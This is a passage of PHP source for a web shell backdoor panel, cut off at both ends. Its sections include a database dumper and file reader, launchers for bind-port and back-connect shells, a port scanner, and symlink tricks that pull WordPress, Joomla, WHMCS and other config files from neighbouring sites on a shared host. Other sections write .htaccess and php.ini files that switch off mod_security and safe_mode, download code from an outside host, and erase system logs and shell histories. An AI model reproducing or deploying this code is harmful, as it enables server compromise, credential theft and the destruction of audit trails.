frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \'&nbsp;\r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> 